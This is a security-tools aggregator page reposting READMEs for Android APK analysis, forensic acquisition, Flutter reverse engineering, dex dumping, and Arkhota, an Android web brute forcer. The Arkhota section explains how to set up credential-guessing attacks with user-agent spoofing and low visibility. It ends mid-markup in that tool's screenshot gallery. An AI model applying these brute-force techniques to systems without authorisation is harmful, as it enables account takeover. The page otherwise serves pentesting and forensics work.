KitPloit - PenTest & Hacking Tools: leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security

Apepe - Enumerate Information From An App Based On The APK File (2023-10-02)<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhw6O8b8caTvB-A7ijzMGfYIXBHkKIpf1akNvg4qhM_h2Oyd_NZQw5Ylz0Qm61PAfuZrEf5dSxiuBe0EF9rXOqD2pUIrQABse14MLmNdqfmLi-2D7JonqC9OZCxS3KL5C7CsF4x9vgyEUZ7tJr99HXRA22sLjxDLAe4rhlUMuuvsAU-NSBCyjwoVf1Aw7mg"><img alt="" border="0" height="184" id="BLOGGER_PHOTO_ID_7276661095547280610" src="https://blogger.googleusercontent.com/img/a/AVvXsEhw6O8b8caTvB-A7ijzMGfYIXBHkKIpf1akNvg4qhM_h2Oyd_NZQw5Ylz0Qm61PAfuZrEf5dSxiuBe0EF9rXOqD2pUIrQABse14MLmNdqfmLi-2D7JonqC9OZCxS3KL5C7CsF4x9vgyEUZ7tJr99HXRA22sLjxDLAe4rhlUMuuvsAU-NSBCyjwoVf1Aw7mg=w640-h184" width="640" /></a></p> <br /> <p dir="auto"><strong>Apepe</strong> is a Python tool developed to help <a href="https://www.kitploit.com/search/label/Pentesters" target="_blank" title="pentesters">pentesters</a> and <a href="https://www.kitploit.com/search/label/Red%20Teamers" target="_blank" title="red teamers">red teamers</a> easily get information from a target app. The tool extracts basic information such as the package name, whether the app is signed, and the development language...</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h3 dir="auto" tabindex="-1">Installing / Getting started</h3> <p dir="auto">A quick guide to installing and using Apepe.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="1. git clone https://github.com/oppsec/Apepe.git 2. pip install -r requirements.txt 3. python3 main -f <apk-file.apk>" dir="auto"><pre><code>1. git clone https://github.com/oppsec/Apepe.git<br />2. pip install -r requirements.txt<br />3. python3 main -f <apk-file.apk></code></pre></div> <br /> <h3 dir="auto" tabindex="-1">Pre-requisites</h3> <ul dir="auto"> <li><a href="https://www.python.org/downloads/" rel="nofollow" target="_blank" title="Python">Python</a> installed on your machine</li> <li>The .apk from the target mobile app</li> </ul> <br /> <h3 dir="auto" tabindex="-1">Features</h3> <ul dir="auto"> <li>Detect <a href="https://www.kitploit.com/search/label/Mobile%20App" target="_blank" title="mobile app">mobile app</a> development language</li> <li>Information gathering</li> <li>Extremely fast</li> <li>Low RAM and CPU usage</li> <li>Made in Python</li> </ul> <br /> <h3 dir="auto" tabindex="-1">Example</h3> <p dir="auto" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiu7eVw6qiUKdIpZ62S7R33Il5f72__8RBOCf6mymCN69nff6RacozlYQTNfVpgx7zBKVeUkIOTB_OeTNpvPGqOQfFAmMVikBm9c3v_oOXzVj3b3iYJWGOkbYjaaebXVAM2F6YOQnBMlVprv0aNGLjEBbNDpbtRwKrpjh2OetwTZwwzdVEmfODJVrH9SV1t"><img alt="" border="0" height="338" id="BLOGGER_PHOTO_ID_7276661115589595954" src="https://blogger.googleusercontent.com/img/a/AVvXsEiu7eVw6qiUKdIpZ62S7R33Il5f72__8RBOCf6mymCN69nff6RacozlYQTNfVpgx7zBKVeUkIOTB_OeTNpvPGqOQfFAmMVikBm9c3v_oOXzVj3b3iYJWGOkbYjaaebXVAM2F6YOQnBMlVprv0aNGLjEBbNDpbtRwKrpjh2OetwTZwwzdVEmfODJVrH9SV1t=w640-h338" width="640" /></a></p> <br /> <h3 dir="auto" tabindex="-1">To-Do</h3> <ul class="contains-task-list"> <li class="task-list-item">Support for .ipa files (iOS)</li> <li class="task-list-item">Detect the certificate library used by the app</li> <li class="task-list-item">Add an argument to return a list of possible SSL pinning scripts</li> <li class="task-list-item">Common <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> check?</li> </ul> <br /> <h3 dir="auto" tabindex="-1">Contributing</h3> <p dir="auto">A quick guide to contributing to the project.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="1. Create a fork from Apepe repository 2. Download the project with git clone https://github.com/your/Apepe.git 3. cd Apepe/ 4. Make your changes 5. Commit and make a git push 6. Open a pull request" dir="auto"><pre><code>1. Create a fork from Apepe repository<br />2. Download the project with git clone https://github.com/your/Apepe.git<br />3. cd Apepe/<br />4. Make your changes<br />5. Commit and make a git push<br />6. Open a pull request</code></pre></div> <br /> <h3 dir="auto" tabindex="-1"><div>Warning</div></h3> <ul dir="auto"> <li>The developer is not responsible for any malicious use of this tool.</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/oppsec/Apepe" rel="nofollow" target="_blank" title="Download Apepe">Download Apepe</a></span></b></div>

Androidqf - (Android Quick Forensics) Helps Quickly Gathering Forensic Evidence From Android Devices, In Order To Identify Potential Traces Of Compromise (2021-11-04)<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgaz3pE5GN0Hw1_94tYn5ZEJqg0J7XMY63KUhsgtm8AwSv4d-_G3OpdXSz85Y7JfSftQ7vzpmXlSsYCGI4S4zRCAULVLmOjW1VyMsRP9xMFncBukMNs1hRZz8wXNqkHmEglCc5i73rbK8DA8u2HBb8J37yoW8isyBDokXS82v19rJLv29oB-nlhJSArrg=s592" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="324" data-original-width="592" height="350" src="https://blogger.googleusercontent.com/img/a/AVvXsEgaz3pE5GN0Hw1_94tYn5ZEJqg0J7XMY63KUhsgtm8AwSv4d-_G3OpdXSz85Y7JfSftQ7vzpmXlSsYCGI4S4zRCAULVLmOjW1VyMsRP9xMFncBukMNs1hRZz8wXNqkHmEglCc5i73rbK8DA8u2HBb8J37yoW8isyBDokXS82v19rJLv29oB-nlhJSArrg=w640-h350" width="640" /></a></div><br /> <p>androidqf (Android Quick Forensics) is a portable tool to simplify the acquisition of relevant forensic data from Android devices. It is the successor of <a href="https://github.com/botherder/snoopdroid" rel="nofollow" target="_blank" title="Snoopdroid">Snoopdroid</a>, rewritten in Go and leveraging the official adb binaries.</p> <p>androidqf is intended to provide a simple and portable cross-platform utility to quickly acquire data from Android devices. It is similar in functionality to <a href="https://github.com/mvt-project/mvt" rel="nofollow" target="_blank" title="mvt-android">mvt-android</a>. However, unlike MVT, androidqf is designed to be easily run by non-tech-savvy users as well.</p> <p><a href="https://github.com/botherder/androidqf/releases/latest" rel="nofollow" target="_blank" title="Download androidqf">Download androidqf</a></p> <br /><span style="font-size: large;"><b>Build</b></span><br /> <p>Executable binaries for Linux, Windows and Mac should be available in the <a href="https://github.com/botherder/androidqf/releases/latest" rel="nofollow" target="_blank" title="latest release">latest release</a>. 
If you have issues running the binary, you might want to build it yourself.</p> <p>To build androidqf you will need Go 1.15+ installed. You will also need to install <code>make</code>. When ready, clone the repository and run the command for your platform of choice:</p> <div class="snippet-clipboard-content position-relative overflow-auto" data-snippet-clipboard-copy-content="make linux make darwin make windows "><pre><code>make linux<br />make darwin<br />make windows<br /></code></pre></div> <p>These commands generate binaries in a <em>build/</em> folder.</p> <br /><span style="font-size: large;"><b>How to use</b></span><br /> <p>Before launching androidqf you need to have the target Android device connected to your computer via USB, with USB debugging enabled. Please refer to the <a href="https://developer.android.com/studio/debug/dev-options#enable" rel="nofollow" target="_blank" title="official documentation">official documentation</a> on how to do this, but be mindful that Android phones from different manufacturers might require different navigation steps than the defaults.</p> <p>Once USB <a href="https://www.kitploit.com/search/label/Debugging" target="_blank" title="debugging">debugging</a> is enabled, you can launch androidqf. It will first attempt to connect to the device over the USB bridge, which should make the Android phone prompt you to manually authorize the host keys. Make sure to authorize them, ideally permanently, so that the prompt does not appear again.</p> <p>Now androidqf should be running and creating an acquisition folder at the same path where you placed your androidqf binary. 
At some point during the execution, androidqf will prompt you with some choices: these prompts pause the acquisition until you provide a selection, so pay attention.</p> <p>The following data can be extracted:</p> <ol> <li>A list of all packages installed and related distribution files.</li> <li>(Optional) Copy of all installed APKs, or of only those not marked as system apps.</li> <li>The output of the <code>dumpsys</code> shell command, providing diagnostic information about the device.</li> <li>The output of the <code>getprop</code> shell command, providing build information and configuration parameters.</li> <li>The output of the <code>ps</code> shell command, providing a list of all running processes.</li> <li>(Optional) A backup of SMS and MMS messages.</li> </ol> <br /><span style="font-size: large;"><b>Encryption & Potential Threats</b></span><br /> <p>Carrying androidqf acquisitions on an unencrypted drive might expose you, and even more so those you acquired data from, to significant risk. For example, you might be stopped at a problematic border and your androidqf drive could be seized. The raw data might not only reveal the purpose of your trip, but will also likely contain very sensitive data (for example the list of installed applications, or even SMS messages).</p> <p>Ideally the drive should be fully encrypted, but that might not always be possible. You could also consider placing androidqf inside a <a href="https://www.veracrypt.fr/" rel="nofollow" target="_blank" title="VeraCrypt">VeraCrypt</a> <a href="https://www.kitploit.com/search/label/Container" target="_blank" title="container">container</a> and carrying with it a copy of VeraCrypt to mount it. 
However, VeraCrypt <a href="https://www.kitploit.com/search/label/Containers" target="_blank" title="containers">containers</a> are typically protected only by a password, which you might be forced to provide.</p> <p>Alternatively, androidqf allows you to encrypt each acquisition with a provided <a href="https://age-encryption.org" rel="nofollow" target="_blank" title="age">age</a> public key. Preferably, this public key belongs to a keypair whose private key the end user does not possess, or at least does not carry. That way, the end user cannot decrypt the acquired data even under duress.</p> <p>If you place a file called <code>key.txt</code> in the same folder as the androidqf executable, androidqf will automatically attempt to compress and encrypt each acquisition and delete the original unencrypted copies.</p> <p>Once you have retrieved an encrypted acquisition file, you can decrypt it with age like so:</p> <div class="snippet-clipboard-content position-relative overflow-auto" data-snippet-clipboard-copy-content="$ age --decrypt -i ~/path/to/privatekey.txt -o <UUID>.zip <UUID>.zip.age "><pre><code>$ age --decrypt -i ~/path/to/privatekey.txt -o <UUID>.zip <UUID>.zip.age<br /></code></pre></div> <p>Bear in mind that it is always possible that at least some portion of the unencrypted data could be recovered through advanced <a href="https://www.kitploit.com/search/label/Forensics" target="_blank" title="forensics">forensics</a> techniques, although we're working to mitigate that.</p> <br /><span style="font-size: large;"><b>License</b></span><br /> <p>The purpose of androidqf is to facilitate the <em><strong>consensual forensic analysis</strong></em> of devices of those who might be targets of sophisticated mobile spyware attacks, especially members of civil society and marginalized communities. We do not want androidqf to enable privacy violations of non-consenting individuals. 
Therefore, the goal of this license is to prohibit the use of androidqf (and any other software licensed the same way) for the purpose of <em>adversarial forensics</em>.</p> <p>To achieve this, androidqf is released under the <a href="https://license.mvt.re/1.1/" rel="nofollow" target="_blank" title="MVT License 1.1">MVT License 1.1</a>, an adaptation of the <a href="https://www.mozilla.org/MPL" rel="nofollow" target="_blank" title="Mozilla Public License v2.0">Mozilla Public License v2.0</a>. This modified license includes a new clause 3.0, "Consensual Use Restriction", which permits the use of the licensed software (and any <em>"Larger Work"</em> derived from it) exclusively with the explicit consent of the person/s whose data is being extracted and/or analysed (the <em>"Data Owner"</em>).</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/botherder/androidqf" rel="nofollow" target="_blank" title="Download Androidqf">Download Androidqf</a></span></b></div>

Doldrums - A Flutter/Dart Reverse Engineering Tool (2021-08-03)<p style="text-align: center;"><a href="http://3.bp.blogspot.com/-tTUkIW-TdlE/YP8f9froezI/AAAAAAAAops/NJuPvbe9mJwkOax5FX5yTMCcUaQlsPF4ACK4BGAYYCw/s1600/Doldrums_1_logo-783659.png"><img alt="" border="0" height="176" id="BLOGGER_PHOTO_ID_6989340288039287602" src="http://3.bp.blogspot.com/-tTUkIW-TdlE/YP8f9froezI/AAAAAAAAops/NJuPvbe9mJwkOax5FX5yTMCcUaQlsPF4ACK4BGAYYCw/w640-h176/Doldrums_1_logo-783659.png" width="640" /></a></p> <p><em>To flutter: to move in quick, irregular motions, to beat rapidly, to be agitated.</em><br /> <em>Doldrums: a period of stagnation.</em></p> <p>Doldrums is a <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank" title="reverse engineering">reverse engineering</a> tool for Flutter apps targeting Android. Concretely, it is a parser and information <a href="https://www.kitploit.com/search/label/Extractor" target="_blank" title="extractor">extractor</a> for the Flutter/Dart <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> binary, conventionally named <code>libapp.so</code>, for all Dart version 2.10 releases. When run, it outputs a full dump of all classes present in the isolate snapshot.</p> <p>The tool is currently in <strong>beta</strong>, and is missing some <a href="https://www.kitploit.com/search/label/Deserialization" target="_blank" title="deserialization">deserialization</a> routines and class information. If it does not work out of the box, please let me know.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Dependencies</b></span><br /> <p>Doldrums requires <a href="https://github.com/eliben/pyelftools" rel="nofollow" target="_blank" title="pyelftools">pyelftools</a> to parse the ELF format. You can install it with</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="pip3 install pyelftools "><pre><code>pip3 install pyelftools<br /></code></pre></div> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>To use it, simply run the following command, substituting <code>libapp.so</code> with the appropriate binary and <code>output</code> with the desired output file. 
Note that the verbose option only works for Dart snapshot v2.12.</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="python3 src/main.py [-v] libapp.so output "><pre><code>python3 src/main.py [-v] libapp.so output<br /></code></pre></div> <p>The expected output is a dump of all classes, in the following format:</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="class MyApp extends StatelessWidget { Widget build(DynamicType, DynamicType) { Code at absolute offset: 0xec85c } String myPrint(DynamicType, DynamicType) { Code at absolute offset: 0xeca80 } } "><pre><code>class MyApp extends StatelessWidget {<br /> Widget build(DynamicType, DynamicType) {<br /> Code at absolute offset: 0xec85c<br /> }<br /><br /> String myPrint(DynamicType, DynamicType) {<br /> Code at absolute offset: 0xeca80<br /> }<br />}<br /></code></pre></div> <p>The absolute code offset indicates the offset into the <code>libapp.so</code> file where the native function may be found.</p> <br /><span style="font-size: large;"><b>Reading material</b></span><br /> <p>For a detailed write-up on the format, please check my <a href="https://rloura.wordpress.com/2020/12/04/reversing-flutter-for-android-wip/" rel="nofollow" target="_blank" title="blog post">blog post</a>.</p> <br /><span style="font-size: large;"><b>Related works</b></span><br /> <p><a href="https://github.com/mildsunrise/darter" rel="nofollow" target="_blank" title="darter">darter</a> is a fully implemented and fully tested parser for Dart version 2.5 releases.</p> <br /><span style="font-size: large;"><b>Contribute</b></span><br /> <p>If you'd like to help the project, consider making a pull request, or donating to</p> <ul> <li>ADA: DdzFFzCqrhsgHAVMtnep9Uq9iF61oxZ31LWVG3izmT8BH54Jz7C2gUBFcy6VnCkrbVNqrkevQ4wSwK7dfh7YrUfvSd5toKdE9tzZrcaB</li> <li>BTC: 33piC5kfTdqFyQ5ionmuJkTDJXsFYdzGdS</li> <li>ETH: 0x2bF670503C28B551C80191aeE9F7ACC96e101D9B</li> 
</ul> <hr /> <p>Logo by <a href="https://www.linkedin.com/in/luis-pedro-h-fonseca-4776a024/" rel="nofollow" target="_blank" title="Luis Fonseca">Luis Fonseca</a>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/rscloura/Doldrums" rel="nofollow" target="_blank" title="Download Doldrums">Download Doldrums</a></span></b></div>

FRIDA-DEXDump - Fast Search And Dump Dex On Memory (2021-07-04)<p style="text-align: center;"><a href="http://2.bp.blogspot.com/-UIEmEZ4ao8E/YNj0tTM2JRI/AAAAAAAAeK0/V4uxE25HxIMTMxjVnr92RfX0YcG1pVbUwCK4BGAYYCw/s1600/FRIDA-DEXDump_1_screenshot-751758.png"><img alt="" border="0" height="218" id="BLOGGER_PHOTO_ID_6978596681696027922" src="http://2.bp.blogspot.com/-UIEmEZ4ao8E/YNj0tTM2JRI/AAAAAAAAeK0/V4uxE25HxIMTMxjVnr92RfX0YcG1pVbUwCK4BGAYYCw/w640-h218/FRIDA-DEXDump_1_screenshot-751758.png" width="640" /></a></p> <br /><span style="font-size: large;"><b>Features</b></span><br /> <ol> <li>Supports fuzzy search for dex files with broken headers.</li> <li>Repairs the structure of the dex header.</li> <li>Compatible with all <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="android">Android</a> versions supported by Frida.</li> <li>Can be loaded as an <a href="https://www.kitploit.com/search/label/objection" target="_blank" title="objection">objection</a> <a href="https://www.kitploit.com/search/label/Plugin" target="_blank" title="plugin">plugin</a>.</li> <li>A PyPI package has been released.</li></ol><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Requires</b></span><br /> <ul> <li><a href="https://www.github.com/frida/frida" rel="nofollow" target="_blank" title="frida">frida</a>: <code>pip install frida</code></li> <li>[optional] <a href="https://pypi.org/project/click/" rel="nofollow" target="_blank" title="click">click</a>: <code>pip install click</code></li> </ul> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <br /><b>From PyPI</b><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="pip3 install frida-dexdump frida-dexdump -h "><pre><code>pip3 install frida-dexdump<br />frida-dexdump -h<br /></code></pre></div> <br /><b>From source</b><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="git clone https://github.com/hluwa/FRIDA-DEXDump cd FRIDA-DEXDump/frida-dexdump python3 main.py -h "><pre><code>git clone https://github.com/hluwa/FRIDA-DEXDump<br />cd FRIDA-DEXDump/frida-dexdump<br />python3 main.py -h<br /></code></pre></div> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <ul> <li> <p>Run <code>frida-dexdump</code> or <code>python3 main.py</code> to attach to the current frontmost application and dump its dex files.</p> </li> <li> <p>Or, use command-line arguments:</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="-n: [Optional] Specify target process name, when spawn mode, it requires an application package name. If not specified, use frontmost application. -p: [Optional] Specify pid when multiprocess. If not specified, dump all. -f: [Optional] Use spawn mode, default is disable. -s: [Optional] When spawn mode, start dump work after sleep few seconds. default is 10s. -d: [Optional] Enable deep search maybe detected more dex, but speed will be slower. -h: show help. "><pre><code>-n: [Optional] Specify target process name, when spawn mode, it requires an application package name. If not specified, use frontmost application.<br />-p: [Optional] Specify pid when multiprocess. If not specified, dump all.<br />-f: [Optional] Use spawn mode, default is disable.<br />-s: [Optional] When spawn mode, start dump work after sleep few seconds. 
default is 10s.<br />-d: [Optional] Enable deep search maybe detected more dex, but speed will be slower.<br />-h: show help.<br /></code></pre></div> </li> <li> <p>Or, load it as an objection plugin:</p> <ol> <li>Clone this repo and move <code>frida_dexdump</code> into your plugins folder, e.g.: <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="git clone https://github.com/hluwa/FRIDA-DEXDump ~/Downloads/FRIDA-DEXDump; mv ~/Downloads/FRIDA-DEXDump/frida_dexdump ~/.objection/plugins/dexdump "><pre><code>git clone https://github.com/hluwa/FRIDA-DEXDump ~/Downloads/FRIDA-DEXDump;<br />mv ~/Downloads/FRIDA-DEXDump/frida_dexdump ~/.objection/plugins/dexdump<br /></code></pre></div> </li> <li>Start objection with <code>-P</code> or <code>--plugin-folder</code> pointing at your plugins folder, e.g.: <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="objection -g com.app.name explore -P ~/.objection/plugins "><pre><code>objection -g com.app.name explore -P ~/.objection/plugins<br /></code></pre></div> </li> <li>Run the commands: <ol> <li><code>plugin dexdump search</code> to search for and print all dex files</li> <li><code>plugin dexdump dump</code> to dump all found dex files.</li> </ol> </li> </ol> </li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/hluwa/FRIDA-DEXDump" rel="nofollow" target="_blank" title="Download FRIDA-DEXDump">Download FRIDA-DEXDump</a></span></b></div>

Arkhota - A Web Brute Forcer For Android (2021-06-02)<p style="text-align: center;"><a href="http://4.bp.blogspot.com/-5kSXvnHN-rs/YLcmqfopoZI/AAAAAAAADVg/AcZgzUl0juAQYJ-WcALJqzD5JueIFb_1gCK4BGAYYCw/s1600/Arkhota_1_banner-721104.png"><img alt="" border="0" height="360" id="BLOGGER_PHOTO_ID_6969081459867492754" src="http://4.bp.blogspot.com/-5kSXvnHN-rs/YLcmqfopoZI/AAAAAAAADVg/AcZgzUl0juAQYJ-WcALJqzD5JueIFb_1gCK4BGAYYCw/w640-h360/Arkhota_1_banner-721104.png" width="640" /></a></p> <br /><span style="font-size: large;"><b>What?</b></span><br /> <p>Arkhota is a web (HTTP/S) brute forcer for Android.</p> <br /><span style="font-size: large;"><b>Why?</b></span><br /> <p>A web brute forcer is always on a hacker's computer, for obvious reasons. Sometimes attacks need to be quick and/or require minimal device preparation. Also, a phone draws less attention than a laptop or desktop computer. For these situations, here's Arkhota.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Download</b></span><br /> <p>You can download the APK from <a href="https://github.com/ALW1EZ/Arkhota/releases" rel="nofollow" target="_blank" title="there">there</a>.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>The explanation follows the order of the objects in the app, from top to bottom.</p> <br /><b>Banner</b><br /> <ul> <li>Banner, version & author</li> </ul> <p>You can long-click the <strong>version</strong> to see the about page.</p> <br /><b>Connection</b><br /> <ul> <li>URL (required)</li> </ul> <p>The URL to send the request to.</p> <ul> <li>Body</li> </ul> <p>You need to specify a body <strong>if</strong> you are going to make a POST request.</p> <br /><b>Userlist / Wordlist</b><br /> <ul> <li>Userlist selector</li> </ul> <p><em>Single: Sets a single username</em></p> <p><em>Generate: Generates the list at runtime with the given options</em></p> <p><em>Wordlists: Sets a prepared wordlist</em></p> <p><em>Custom wordlist: You can place your <a href="https://www.kitploit.com/search/label/Custom%20Wordlist" target="_blank" title="custom wordlist">custom wordlist</a> in /sdcard/ABF/</em></p> <p><em>Then this selector will list it (if the required permissions are granted).</em></p> <ul> <li>Username box</li> </ul> <p><em>You need to specify a username <strong>if you selected Single</strong>.</em></p> 
<ul> <li>Charset selectors</li> </ul> <p>[W] <em>You need to specify a charset and a min & max length to generate at runtime.</em></p> <p><strong>If you selected Generate</strong>, the checkboxes will help you select.</p> <ul> <li>Prefix & Suffix</li> </ul> <p><em>You can specify a prefix & suffix to be added to your username</em></p> <br /><b>The same applies to the password part.</b><br /> <br /><b>Configuration</b><br /> <ul> <li>Beep switch</li> </ul> <p><em>Beeps if the attack succeeds.</em></p> <ul> <li>Fail/Success switch</li> </ul> <p><em>Decides how to react to the connection response</em></p> <ul> <li>POST/GET switch</li> </ul> <p><em>Decides the type of connection</em></p> <ul> <li>User-Agent</li> </ul> <p><em>Sets the user-agent for the connection.</em></p> <p><strong>If</strong> "Original UA" is set, the original user-agent is used.</p> <p><strong>Otherwise</strong> the given text is set as the user-agent.</p> <br /><b><strong>tip: It has autocomplete for several user-agents, all of which start with "Mozilla"; type and select one if you don't want to expose your original UA but don't know what to set.</strong></b><br /> <ul> <li>Timeout</li> </ul> <p><em>Sets the connection timeout, in milliseconds</em></p> <ul> <li>Cookie</li> </ul> <p><em>Sets the <a href="https://www.kitploit.com/search/label/Cookie" target="_blank" title="cookie">cookie</a> value for the connection</em></p> <ul> <li>Regex (required)</li> </ul> <p><em>Determines what to look for in the connection response</em></p> <ul> <li>Empty box</li> </ul> <p><em>Tried username:password pairs & the result will be shown there.</em></p> <ul> <li>[W] Start</li> </ul> <p><em>Starts the attack!</em></p> <br /><span style="font-size: large;"><b>Important</b></span><br /> <p>URL & Body: <strong><code>^USER^</code> & <code>^PASS^</code> are placeholders for the username and password.</strong> You need to place them in the URL or the body (depending on the connection type you chose).</p> <p>Regex & Fail/Success switch: These two determine the result of the attack.</p> <p>If the switch points to "Fail" and the given regex is found in the response, this is a fail: continue the attack.</p> <p>If the switch points to "Success" and the given regex is found in the response, this is a success: write the result to the empty box (in the format "FOUND: username:password") and stop the attack.</p> <p>Copying: Long-clicking the empty box copies its content. If a password was found, it is copied in <code>username:password</code> format; otherwise the whole content is copied.</p> <p>If the attack finishes unsuccessfully, it just stops at the last user:password.</p> <br /><span style="font-size: large;"><b>Screenshots & Videos</b></span><br /> <p><a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/1.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (5)"></a><a href="http://4.bp.blogspot.com/-oIYSVKZ3hqw/YLcmqhP0FxI/AAAAAAAADVo/aP0XjSnQ5swEWfqXudTFKhjYlfNA9J5MACK4BGAYYCw/s1600/Arkhota_2_1-721902.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081460300191506" src="http://4.bp.blogspot.com/-oIYSVKZ3hqw/YLcmqhP0FxI/AAAAAAAADVo/aP0XjSnQ5swEWfqXudTFKhjYlfNA9J5MACK4BGAYYCw/s320/Arkhota_2_1-721902.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/2.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (6)"></a><a href="http://2.bp.blogspot.com/-mRTIWPVak_U/YLcmqhta5xI/AAAAAAAADVw/i-0gnOXmyGA2TB_COKNxyugY325vWH_rgCK4BGAYYCw/s1600/Arkhota_3_2-722679.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081460424369938" src="http://2.bp.blogspot.com/-mRTIWPVak_U/YLcmqhta5xI/AAAAAAAADVw/i-0gnOXmyGA2TB_COKNxyugY325vWH_rgCK4BGAYYCw/s320/Arkhota_3_2-722679.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/3.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. 
(7)"></a><a href="http://2.bp.blogspot.com/-zSKkHYq3t0c/YLcmq3-BQBI/AAAAAAAADV4/myYFDxzAybMB4nMT_99Kzj9ZXDHFrANZwCK4BGAYYCw/s1600/Arkhota_4_3-723290.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081466399571986" src="http://2.bp.blogspot.com/-zSKkHYq3t0c/YLcmq3-BQBI/AAAAAAAADV4/myYFDxzAybMB4nMT_99Kzj9ZXDHFrANZwCK4BGAYYCw/s320/Arkhota_4_3-723290.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/4.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (8)"></a><a href="http://3.bp.blogspot.com/-j6PLyvN_ILE/YLcmrEPdBdI/AAAAAAAADWA/EAeCFOQKsKw7J9TPvAgiQDNazAU6seQmgCK4BGAYYCw/s1600/Arkhota_5_4-723989.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081469693920722" src="http://3.bp.blogspot.com/-j6PLyvN_ILE/YLcmrEPdBdI/AAAAAAAADWA/EAeCFOQKsKw7J9TPvAgiQDNazAU6seQmgCK4BGAYYCw/s320/Arkhota_5_4-723989.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/5.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (9)"></a><a href="http://1.bp.blogspot.com/-knNZybufvv4/YLcmrY9uX8I/AAAAAAAADWI/Wd2Si_cypiUeTswEXfS5XQn23_cwQjvPwCK4BGAYYCw/s1600/Arkhota_6_5-724945.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081475256704962" src="http://1.bp.blogspot.com/-knNZybufvv4/YLcmrY9uX8I/AAAAAAAADWI/Wd2Si_cypiUeTswEXfS5XQn23_cwQjvPwCK4BGAYYCw/s320/Arkhota_6_5-724945.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/6.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. 
(10)"></a><a href="http://4.bp.blogspot.com/-UuRdbbCnU6k/YLcmrrPwJwI/AAAAAAAADWQ/09CWdN1XNsoWReIl4IH8FMm-M4NXusV7QCK4BGAYYCw/s1600/Arkhota_7_6-725687.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081480164157186" src="http://4.bp.blogspot.com/-UuRdbbCnU6k/YLcmrrPwJwI/AAAAAAAADWQ/09CWdN1XNsoWReIl4IH8FMm-M4NXusV7QCK4BGAYYCw/s320/Arkhota_7_6-725687.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/7.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (11)"></a><a href="http://4.bp.blogspot.com/-s9ssDwmdxbM/YLcmrlgUiHI/AAAAAAAADWY/yBA7Ehx5dB4tyRz4S_SWpemW30yVO9C7QCK4BGAYYCw/s1600/Arkhota_8_7-726634.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081478623037554" src="http://4.bp.blogspot.com/-s9ssDwmdxbM/YLcmrlgUiHI/AAAAAAAADWY/yBA7Ehx5dB4tyRz4S_SWpemW30yVO9C7QCK4BGAYYCw/s320/Arkhota_8_7-726634.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/8.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (12)"></a><a href="http://2.bp.blogspot.com/-3yWjJiQNJus/YLcmr3AByZI/AAAAAAAADWg/TiwPdDTYa3YswhnMJeCIfmRD6R4ELHYmwCK4BGAYYCw/s1600/Arkhota_9_8-727314.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081483319429522" 